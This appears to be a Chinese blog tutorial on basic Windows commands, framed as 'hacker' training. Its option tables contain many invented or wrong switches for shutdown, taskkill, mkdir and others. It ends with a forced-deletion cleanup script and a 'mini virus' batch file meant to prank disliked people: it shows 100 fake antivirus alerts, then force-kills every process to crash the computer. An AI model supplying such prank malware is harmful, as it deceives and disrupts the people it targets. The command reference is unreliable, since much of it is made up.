黑客攻防教程(1):windows 基本操作

一、功能全家桶

1. windows 操作

1.1 shutdown

shutdown:停止工作,关机。

参数意义
-a取消计划的关机
-b立刻重新启动计算机
-c指定关机理由
-d指定关机理由代码和文本描述
-e显示关机理由和评论
-f关闭所有正在运行的程序
-h关机并停止计算机的电源
-i显示远程关机对话框
-k发送关机警告消息给网络上的计算机
-l注销当前用户并返回登录屏幕
-m远程关机指定的计算机
-p立刻关机
-r关机并重新启动计算机
-s关闭计算机
-t设置关机操作的延迟时间
-u取消计划的关机操作
-v显示详细信息,包括计划关机的时间和消息
-x立即关闭计算机并且不进行警告和确认
-y关闭计算机前不需要确认
-z暂停计划的关机操作

1.2 reg

reg:操作 Windows 注册表。

参数意义
add添加新的注册表项和值
delete删除注册表项和值
copy复制注册表项和值
query显示注册表项和值
export将指定的注册表项导出到文件
import将保存的注册表项从文件导入
load将注册表的某个部分加载到一个新的键
unload将已加载的注册表部分卸载

2. 进程、文件操作

2.1 taskkill

taskkill:进程终止工具。

参数意义
/F强制终止进程,不弹出确认提示框
/FI <过滤器>使用过滤器筛选要终止的进程
/IM <进程名>终止与指定进程名匹配的进程
/PID <进程ID>终止与指定进程 ID 匹配的进程
/T终止指定进程及其子进程
/ABOVENORMAL终止高于正常优先级的进程
/BELOWNORMAL终止低于正常优先级的进程
/HIGH终止高优先级的进程
/LOW终止低优先级的进程
/REALTIME终止实时优先级的进程
/IM <进程名1> /IM <进程名2> /IM <进程名3>...终止与指定进程名匹配的多个进程
/PID <进程ID1> /PID <进程ID2> /PID <进程ID3>...终止指定的多个进程
/S <计算机名>在指定的远程计算机上执行操作
/U <用户名> /P <密码>使用指定的用户名和密码连接到远程计算机
/NODE <计算机名>在指定的计算机节点上执行操作
/M <计算机名>终止指定计算机上的所有进程
/IM <进程名> /FI <过滤器>根据进程名和过滤器筛选要终止的进程
/PID <进程ID> /FI <过滤器>根据进程ID和过滤器筛选要终止的进程

2.2 start

start:启动程序,打开文件。

参数意义
/D <目录路径>指定程序所在的目录路径
/I用于运行程序以便修改关联设置
/MAX最大化窗口
/MIN最小化窗口
/SEPARATE在新的窗口中启动16位程序
/SHARED在新的进程中启动程序
/WAIT等待程序退出
/B在新的窗口中启动程序,但不激活窗口

2.3 xcopy

xcopy:复制文件和目录。

参数意义
/s复制目录和子目录中的文件
/e复制目录和子目录中的文件,包括空目录
/i如果目标为目录而非文件时,要求确认
/y不提示确认,直接复制
/d仅复制源文件较新或目标文件不存在的文件
/c继续复制,即使出现错误
/r如果文件只读,将其复制为非只读
/h复制隐藏文件和系统文件
/k复制文件属性,如只读、隐藏、系统和存档
/f显示复制的文件和目录名称
/v验证每个文件的复制
/t仅复制目录结构(不复制文件)
/exclude:<文件>指定排除列表中的文件
/exclude+:<文件>指定包含列表中的文件
/excludefile:<文件>指定包含和排除列表文件

2.4 del

del:删除文件。

参数意义
/p每次删除前提示确认
/f强制删除,不提示确认
/s删除指定目录及其子目录中的文件
/q安静模式,不显示删除的文件信息

3. 目录操作

3.1 mkdir

mkdir:创建目录。

参数意义
/p创建目录时,如果上级目录不存在,则同时创建上级目录
/v显示创建的目录路径

3.2 rmdir

rmdir:删除目录。

参数意义
/s删除指定目录及其子目录
/q安静模式,不显示删除的目录信息

3.3 move

move:移动文件和目录。

参数意义
/y不提示确认,直接移动
/-y提示确认,需要确认后才能移动
/s移动当前目录及其子目录中的文件
/-s仅移动当前目录中的文件,不包括子目录
/i如果目标为目录而非文件时,要求确认
/-i如果目标为目录而非文件时,不要求确认
/v显示移动的文件和目录名称
/-v不显示移动的文件和目录名称

4. 黑客基础操作

4.1 ping

ping:测试网络连接、延迟等待。

参数意义
-t持续进行Ping直到手动停止
-n <次数>指定Ping的次数
-w <超时时间>指定等待每次回复的超时时间(毫秒)
-l <数据包大小>设置发送数据包的大小(字节)
-4强制使用IPv4地址
-6强制使用IPv6地址

4.2 ipconfig

ipconfig:显示、修改 IP 配置信息。

参数意义
/all显示详细的IP配置信息
/release释放指定的适配器的IP地址
/renew更新指定适配器的IP地址
/flushdns清除DNS缓存记录
/registerdns刷新DNS客户端的注册表记录
/displaydns显示DNS缓存中的内容
/showclassid显示指定适配器的DHCP类标识符设备ID
/setclassid修改指定适配器的DHCP类标识符设备ID

二、黑客玩具

1. 垃圾清理

@echo off
msg * 正在清理系统垃圾文件,请稍候...
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
rd /s /q %windir%\temp & md %windir%\temp
msg * 清理完成!
pause

清除系统驱动器下的临时文件、视频缓存文件、日志文件、GUID 文件、校验文件、旧版文件,回收站中的所有文件,Windows 系统目录下的备份文件,系统预读取文件夹中的文件,Cookies 和最近使用文件夹中的文件,Internet 临时文件和用户临时文件夹中的所有文件。

重建 Windows 临时文件夹并清空,防止找不到放存临时文件的地方。

2. 迷你病毒

REM 嚯嚯,去整整讨厌的人吧(开个玩笑哈)
@echo off
setlocal

set "message=火绒提示:windows防火墙过期,请及时更新。"
set "cnt=0"

REM 弹窗100次
:loop
if %cnt%==100 goto end

msg * "%message%"
set /a cnt+=1
goto loop

:end

msg * "火绒提示:识别有强病毒。"
timeout /t 5
msg * "火绒提示:已减缓侵入。"
timeout /t 5
msg * "火绒提示:清理残留中…"
timeout /t 5
msg * "火绒提示:已识别出蓝屏病毒。努力清理中…"

REM 蓝屏
taskkill -f -fi "pid ne 1"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值